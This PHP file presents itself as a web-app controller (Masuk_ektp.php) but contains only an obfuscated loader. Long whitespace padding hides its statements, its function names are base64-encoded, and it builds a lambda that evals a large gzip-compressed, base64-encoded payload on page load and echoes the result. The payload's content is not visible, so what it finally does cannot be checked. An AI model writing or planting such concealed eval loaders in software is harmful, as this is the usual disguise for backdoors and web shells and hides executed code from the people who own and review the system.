<?php 
        $__='printf';$_='Loading donjo-app/controllers/fmandiri/Masuk_ektp.php';
        























































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






















































































































































































































































































                                                                                                                                                                                                                     $________;
